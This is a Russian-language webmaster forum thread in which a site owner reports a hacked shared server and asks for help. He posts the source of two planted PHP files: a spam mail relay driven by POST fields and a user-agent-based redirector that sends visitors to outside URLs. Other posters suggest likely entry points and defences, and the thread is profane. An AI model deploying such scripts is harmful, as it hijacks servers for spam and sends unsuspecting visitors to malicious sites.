На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 10/01/15 в 17:33 |
Обнаружи у себя повсеместно созданный файл wfg.php с таким содержимым:
Код: [развернуть] | <?php $HmqenXtApUBX = stripslashes($_POST['OejVxex']); $SFQsFl = stripslashes($_POST['GQrR']); $oabczZQYGw = stripslashes($_POST['bupthoehyRL']); $rato = mail(stripslashes($HmqenXtApUBX), stripslashes($SFQsFl), stripslashes($oabczZQYGw)); if($rato){echo 'dOuAfkhHe';} else {echo 'MdxXEYvzD : '.$XJaIKNNKlBfm;} ?> |
Проверьте у себя наличие на всякий пожарный.
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
3
|
|
|
С нами с 17.03.12
Сообщения: 335
Рейтинг: 790
|
Добавлено: 10/01/15 в 17:57 |
я бы присмотрелся к WP и его плагинам
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 10/01/15 в 18:17 |
Даже пока что не знаю на что думать...
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
2
|
|
|
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
Добавлено: 10/01/15 в 18:59 |
CrazyMen: стукни мне в скайп помогу. А так могли через что угодно но в этом списке скорее CJ.
|
|
|
|
Кладовщик
С нами с 04.03.09
Сообщения: 4495
Рейтинг: 1163
|
Добавлено: 11/01/15 в 23:42 |
"Tuberotator, Smart CJ, WP, Crystal"
Ппц бро! Совет тебе хороший дам - раздели все скрипты по юзерам, так хоть знать будешь где тебя ебанули
|
|
|
|
С нами с 12.12.14
Сообщения: 28
Рейтинг: 26
|
Добавлено: 12/01/15 в 00:14 |
WP нуленый плагин с шелом какой нить, было уже такое
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 12/01/15 в 21:33 |
Да че то недоглядел за этим обычно каждый домен отдельный юзер, а тут.. Скорее всего Wp конечно, только утсановили уже спамить блять начинают, поэтому его и не люблю.. Чем популярнее скрипт тем больше дыр
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
2
|
|
|
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
Добавлено: 12/01/15 в 22:23 |
CrazyMen: вернее не в нем а в темах и плагинах, про спам отруби комменты и все ок.
|
|
|
|
С нами с 12.08.04
Сообщения: 613
Рейтинг: 128
|
Добавлено: 13/01/15 в 09:35 |
советую зарегистриться на ifube и узнавать о появлении всяких левых файлов сразу. сервис пока еще бесплатный.
|
|
|
|
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
Добавлено: 13/01/15 в 11:26 |
Cosinus: была такаяже мысля.
|
|
|
|
Кладовщик
С нами с 04.03.09
Сообщения: 4495
Рейтинг: 1163
|
Добавлено: 13/01/15 в 18:18 |
CrazyMen писал: | только утсановили уже спамить блять начинают |
Тыц
но как они к сисечным сайтам относятся я хз
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 13/01/15 в 19:46 |
Кароче вычистили червак от нечисти. Удалил WP. И сегодня опять всякая хуйня, но уже только на том домене где стоит tuberotator и crustal. Картина возможно сужается...
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
3
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 13/01/15 в 19:56 |
Только там где стоит тубротатор захуячили разноименный php с таким вот содержимым:
Код: [развернуть] | <?php
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
'http://com-ap8.net/zoota.php?a=314759&c=wl_con&s=12AND',
'http://com-152.net/bfqa.php?a=314759&c=wl_con&s=12AND',
'http://com-uh4.net/rbhnc.php?a=314759&c=wl_con&s=12AND',
);
$not_android_urls = array (
'http://com-ap8.net/addd.php?a=314759&c=wl_con&s=12YP',
'http://com-152.net/uzder.php?a=314759&c=wl_con&s=12YP',
'http://com-uh4.net/uls.php?a=314759&c=wl_con&s=12YP',
);
$n = mt_rand(0,count($not_android_urls)-1);
$rand_url=$not_android_urls[$n];
if ( $android == true)
{
$n = mt_rand(0,count($android_urls)-1);
$rand_url=$android_urls[$n];
}
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> "> |
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
2
|
|
|
Кладовщик
С нами с 04.03.09
Сообщения: 4495
Рейтинг: 1163
|
Добавлено: 13/01/15 в 20:46 |
CrazyMen писал: | Картина возможно сужается... |
может дело не в скриптах вовсе? то что код нахуячили это одно, он любой может быть
Смотри сам сервер, чмод, доступы... логи читай в конце концов
|
|
|
|
С нами с 12.12.14
Сообщения: 28
Рейтинг: 26
|
Добавлено: 13/01/15 в 20:50 |
Тебе теперь проверяй все файлы, потому что если владелиц папки где вп стоял и везде владельцем был то мод везде залезть.
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 13/01/15 в 23:18 |
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
Добавлено: 13/01/15 в 23:55 |
CrazyMen: апач?
|
|
|
|
Кладовщик
С нами с 04.03.09
Сообщения: 4495
Рейтинг: 1163
|
Добавлено: 14/01/15 в 00:13 |
Если хост тот что в подписи там сипанелька по идее стоит, давно ее не юзал правда, но по памяти там иерархия хранения скриптов и назначение им юзеров - полный пиздец (может что и изменилось за последнее время я хз), если у тебя было все в одном котле 100 % у тебя уже заражено все скрипты, и то чтоты удалишь файл или один из скриптов полностью до жопы и апач не причем!
|
|
|
|
+ +
WP-Master
С нами с 17.01.13
Сообщения: 1922
Рейтинг: 1123
|
Добавлено: 14/01/15 в 02:02 |
как я и ранее говорил пиши мне глянем что за пиздец у тебя.
|
|
|
|